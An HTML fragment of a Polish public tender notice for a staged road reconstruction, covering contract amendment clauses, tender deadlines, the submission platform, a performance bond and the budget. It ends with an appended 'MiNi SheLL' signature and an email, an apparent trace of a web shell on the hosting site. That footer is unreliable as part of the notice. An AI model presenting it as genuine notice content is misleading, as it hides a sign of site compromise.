jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Inwestycja w cyklu dwu letnim. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> patrz SWZ (...)<br/>§ 20<br/>Zmiany w umowie<br/>1. Wszelkie zmiany i uzupełnienia treści Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej Umowy w poniżej opisanym zakresie i w<br/>przypadku wystąpienia, co najmniej jednej z wyszczególnionych okoliczności.<br/>1) Działanie siły wyższej<br/>- przez okoliczność siły wyższej Strony rozumieją zdarzenie zewnętrzne o charakterze nadzwyczajnym, którego nie można<br/>było przewidzieć ani jemu zapobiec, które uniemożliwia jednej ze Stron wypełnienie w całości lub części zobowiązań<br/>wynikających z niniejszej Umowy,<br/>- za okoliczności siły wyższej strony nie uznają sezonowości pór roku i związanych z tym zmian warunków atmosferycznych,<br/>- jeżeli wskutek okoliczności siły wyższej Strona nie będzie mogła wykonywać swoich obowiązków umownych w całości lub<br/>w części, niezwłocznie powiadomi o tym drugą Stronę, a w takim przypadku uzgodniony zostanie sposób i zasady dalszego<br/>postępowania;<br/>2) Zmiany terminów – przekazania Wykonawcy terenu budowy, rozpoczęcia i zakończenia zadania, wraz ze skutkami<br/>wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być:<br/>a) zmianami spowodowanymi warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypały i<br/>niewybuchy, wykopaliska archeologiczne, odmienne od przyjętych w dokumentacji projektowej warunki geologiczne<br/>(kategorie gruntu, kurzawka itp.), odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności<br/>istnienie urządzeń podziemnych, instalacji itp.;<br/>b) wyjątkowo niepomyślnymi warunkami klimatycznymi,<br/>c) działaniem sił przyrody, uniemożliwiającym wykonywanie prac w sposób ciągły przez okres minimum 7 dni, które winno<br/>być potwierdzone w sposób obiektywny (np. przez Instytut Meteorologii i Gospodarki Wodnej, informacje z punktów<br/>prognostycznych LP itp.),<br/>d) zawarcia umowy na realizacje zamówienia, polegającego na powtórzeniu podobnych usług i robót budowlanych, o<br/>których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp lub wprowadzenie robót zamiennych (opisanych w § 9 i § 10 Umowy), jeżeli<br/>uniemożliwia to wykonanie przedmiotu Umowy w pierwotnym terminie,<br/>e) wprowadzeniem zmian do Umowy w trybie art. 445 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych (Dz. U. z 2019 r. poz. 2019, z 2020 r. poz. 288, 875, 1492, 1517, 2275, 2320), jeżeli wpływają one na termin<br/>wykonania przedmiotu Umowy,<br/>f) zmianami będącymi następstwem okoliczności leżących po stronie Zamawiającego,<br/>w szczególności: wstrzymanie robót przez Zamawiającego na jego wyraźne żądanie, konieczność usunięcia błędów lub<br/>wprowadzenia zmian w dokumentacji projektowej,<br/>g) wprowadzeniem przez projektanta autopoprawki w dokumentacji projektowej w ramach prowadzonego nadzoru<br/>autorskiego, w zakresie realizacji przedmiotu Umowy zgodnie z tymi poprawkami, w przypadku jeśli wprowadzenie<br/>autopoprawki wpływa na brak możliwości na wykonanie przedmiotu Umowy w pierwotnym terminie,<br/>h) zmianami będącymi następstwem działania organów administracji, w szczególności: przekroczenia zakreślonych przez<br/>prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp., odmowa wydania przez organ administracji<br/>wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej;<br/>i) przyczynami zewnętrznymi niezależnymi od Zamawiającego oraz Wykonawcy, skutkującymi niemożliwością prowadzenia<br/>prac;<br/>O zaistnieniu jakiejkolwiek przyczyny opóźnień Wykonawca zobowiązany jest powiadomić Zamawiającego na piśmie w<br/>terminie do 2 (dwóch) dni po zdarzeniu... <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_marcule</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-13 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ze względu na ograniczenia znakowe prosimy zapoznać się z pełną treścią Specyfikacji Warunków Zamówienia.<br/>Wykonawcom, a także innemu podmiotowi, jeżeli ma lub miał interes w<br/>uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez<br/>zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej na zasadachprzewidzianych w art. 505 – 590<br/>ustawy Pzp. Wykonawca zobowiązany jest przed zawarciem<br/>umowy wnieść zabezpieczenie należytego wykonania umowy w wysokości 5 (pięć) % ceny<br/>brutto podanej w ofercie. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub ...<br/>Zadanie (przebudowa drogi) jest realizowane w 4 etapach – etap ten (Etap III) ma zostać z realizowany w całości w wyznaczonym terminie w cyklu dwuletnim do 2025 r. ze względu na posiadane środki finansowe w danym roku gospodarczym.<br/>Zamawiający posiada w tym roku budżetowym na tą inwestycję kwotę netto 850 000 zł.<br/>Inwestycja ze względu na nie zakończony etap drugi, może zostać rozpoczęta od kilometraża 7+000-5+000.

Creat By MiNi SheLL
Email: jattceo@gmail.com